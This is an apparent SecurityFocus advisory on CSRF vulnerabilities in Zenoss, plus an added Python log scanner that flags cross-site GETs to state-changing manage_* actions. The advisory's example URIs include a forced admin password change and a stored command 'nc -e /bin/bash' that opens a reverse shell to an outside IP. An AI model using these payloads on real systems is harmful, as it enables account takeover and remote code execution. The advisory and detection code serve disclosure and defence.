Zenoss Multiple Cross Site Request Forgery Vulnerabilities

To exploit these issues, an attacker must entice a user into visiting a malicious URI.

The following example URIs demonstrate the issues:

http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping
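The three URIs above share one pattern: a state-changing Zope action (a manage_* method, called either as the last path element or through a "<name>:method=" query parameter) is reached by a plain GET that the victim's browser sends from a page on another site. The following is an added detection example, not part of the advisory or of Zenoss: it scans combined-format web server log lines for that pattern and flags GETs to such actions whose Referer is missing or from a foreign host. The host name and all log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Zope/Zenoss "manage_*" actions are state-changing whether invoked as the last
# path element (manage_doUserCommand) or via a "<name>:method=" query parameter
# (manage_editUserSettings:method=Save), as in the advisory's URIs.
MANAGE_ACTION = re.compile(r"manage_\w+")

# Combined log format; the Referer field is what the check relies on.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<verb>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)


def is_state_change(target: str) -> bool:
    """True if the request target invokes a manage_* action."""
    parts = urlsplit(target)
    if MANAGE_ACTION.fullmatch(parts.path.rsplit("/", 1)[-1]):
        return True
    for key in parse_qs(parts.query, keep_blank_values=True):
        name, sep, marker = key.partition(":")
        if sep and marker == "method" and MANAGE_ACTION.fullmatch(name):
            return True
    return False


def is_csrf_candidate(line: str, own_host: str) -> bool:
    """GET to a state-changing action with a missing or foreign Referer."""
    m = LOG_RE.match(line)
    if not m or m["verb"] != "GET" or not is_state_change(m["target"]):
        return False
    referer = m["referer"]
    if referer in ("", "-"):
        return True  # no Referer: cannot confirm the request came from our own UI
    return urlsplit(referer).netloc.lower() != own_host.lower()


def csrf_candidates(lines, own_host):
    """Return the request targets in `lines` that look like CSRF attempts."""
    return [LOG_RE.match(line)["target"] for line in lines if is_csrf_candidate(line, own_host)]


# Constructed sample lines (hosts and values are made up for this example).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2010:12:00:01 +0000] "GET /zport/dmd/ZenUsers/admin?manage_editUserSettings:method=Save&password=changed HTTP/1.1" 200 512 "http://lure.example.net/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Mar/2010:12:00:02 +0000] "GET /zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2010:12:00:03 +0000] "GET /zport/dmd/ZenUsers/admin?manage_editUserSettings:method=Save HTTP/1.1" 200 512 "http://zenoss.example.com/zport/dmd/ZenUsers/admin" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2010:12:00:04 +0000] "GET /zport/dmd/Devices HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for target in csrf_candidates(SAMPLE_LOG, "zenoss.example.com"):
        print("CSRF candidate:", target)
```

A same-origin Referer only shows that a request was not obviously cross-site; the actual fix is a per-request anti-CSRF token on every state-changing action, which this log check supplements rather than replaces.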

Copyright 2010, SecurityFocus